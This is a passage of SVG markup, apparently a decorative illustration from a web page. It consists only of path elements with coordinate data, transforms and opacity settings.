d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path 